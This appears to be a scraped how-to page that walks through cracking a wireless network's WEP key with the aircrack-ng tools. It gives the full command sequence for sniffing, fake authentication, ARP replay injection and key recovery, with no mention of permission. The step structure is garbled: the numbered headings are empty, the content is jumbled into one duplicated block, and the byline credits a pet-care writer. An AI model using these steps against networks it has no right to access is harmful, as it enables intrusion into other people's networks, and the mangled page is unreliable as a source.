How to Break WEP Encryption

Use Linux., Get a packet-sniffing program., Boot Linux and Backtrack., Select a start-up option., Load the graphical interface via command base., Click on terminal button at the bottom left., Wait for the Linux command terminal to open. , View your...

20 Steps 2 min read Advanced

Step-by-Step Guide

  1. Step 1: Use Linux.

    Windows cannot sniff WEP packets, but you can use a bootable CD of Linux.
  2. Step 2: Get a packet-sniffing program.

    Backtrack is a commonly-used option.

    Download the iso image and burn it on a bootable CD/DVD. , Use your bootable CD/DVDs.

    Note that this operating system is not required to be installed on hard drive.

    That means whenever you shutdown the Backtrack, all your data will be lost. , The following Backtrack screen will show after booting.

    Change the option with the up and down arrow keys and select one.

    This tutorial will use the first option. , In this option, Backtrack is started on command base.

    Type command: startx to continue. , It'll be the fifth option. ,, Enter the following command: "airmon-ng" (without quotes).

    You should see something like wlan0 beneath Interface. , Enter the following command: "airodump-ng wlan0" (without quotes).

    You should get three things:
    BSSID Channel ESSID (AP Name) Here's what the tutorial case turned up:
    BSSID 00:17:3F:76:36:6E Channel number 1 ESSID(AP Name)Suleman , This one will use the example information above, but you should plug in your own.

    Command: "airodump-ng
    -w wep
    -c 1
    -- bssid 00:17:3F:76:36:6E wlan0" (without quotes). ,, Type the following command, substituting the values for your own BSSID, Channel and ESSID.

    Command: "aireplay-ng
    -1 0 –a 00:17:3f:76:36:6E wlan0" (without quotes). , Type the following command: "aireplay-ng
    -3 –b 00:17:3f:76:36:6e wlan0" (without quotes). ,,, It will take 15 to 60 minutes (or more) depending on wireless signal, hardware and load on access point. ,, Type the following command: "dir" (without quotes).

    This will show the directories saved on it during decrypting. , For the example, it would be the following: "aircrack-ng web-02.cap" (without quotes).

    The setup shown below will start. , After this setup completes, you'll be able to break the key.

    In this example, it was {ADA2D18D2E}.
  3. Step 3: Boot Linux and Backtrack.

  4. Step 4: Select a start-up option.

  5. Step 5: Load the graphical interface via command base.

  6. Step 6: Click on terminal button at the bottom left.

  7. Step 7: Wait for the Linux command terminal to open.

  8. Step 8: View your WLAN type.

  9. Step 9: Get all the required information for the access point.

  10. Step 10: Enter the following command.

  11. Step 11: Allow setup to start.

  12. Step 12: Open a new terminal window.

  13. Step 13: Open another new terminal window.

  14. Step 14: Allow setup to start.

  15. Step 15: Go back to the first terminal window.

  16. Step 16: Allow the data in this window to reach to 30000 or above.

  17. Step 17: Go to the third terminal window and press Ctrl + c.

  18. Step 18: Pull up the directories.

  19. Step 19: Use a cap file.

  20. Step 20: Break the WEP encrypted key.

Detailed Guide

Windows cannot sniff WEP packets, but you can use a bootable CD of Linux.

Backtrack is a commonly-used option.

Download the iso image and burn it on a bootable CD/DVD. , Use your bootable CD/DVDs.

Note that this operating system is not required to be installed on hard drive.

That means whenever you shutdown the Backtrack, all your data will be lost. , The following Backtrack screen will show after booting.

Change the option with the up and down arrow keys and select one.

This tutorial will use the first option. , In this option, Backtrack is started on command base.

Type command: startx to continue. , It'll be the fifth option. ,, Enter the following command: "airmon-ng" (without quotes).

You should see something like wlan0 beneath Interface. , Enter the following command: "airodump-ng wlan0" (without quotes).

You should get three things:
BSSID Channel ESSID (AP Name) Here's what the tutorial case turned up:
BSSID 00:17:3F:76:36:6E Channel number 1 ESSID(AP Name)Suleman , This one will use the example information above, but you should plug in your own.

Command: "airodump-ng
-w wep
-c 1
-- bssid 00:17:3F:76:36:6E wlan0" (without quotes). ,, Type the following command, substituting the values for your own BSSID, Channel and ESSID.

Command: "aireplay-ng
-1 0 –a 00:17:3f:76:36:6E wlan0" (without quotes). , Type the following command: "aireplay-ng
-3 –b 00:17:3f:76:36:6e wlan0" (without quotes). ,,, It will take 15 to 60 minutes (or more) depending on wireless signal, hardware and load on access point. ,, Type the following command: "dir" (without quotes).

This will show the directories saved on it during decrypting. , For the example, it would be the following: "aircrack-ng web-02.cap" (without quotes).

The setup shown below will start. , After this setup completes, you'll be able to break the key.

In this example, it was {ADA2D18D2E}.

About the Author

S

Sharon Lee

Specializes in breaking down complex pet care topics into simple steps.

83 articles
View all articles

Rate This Guide

--
Loading...
5
0
4
0
3
0
2
0
1
0

How helpful was this guide? Click to rate: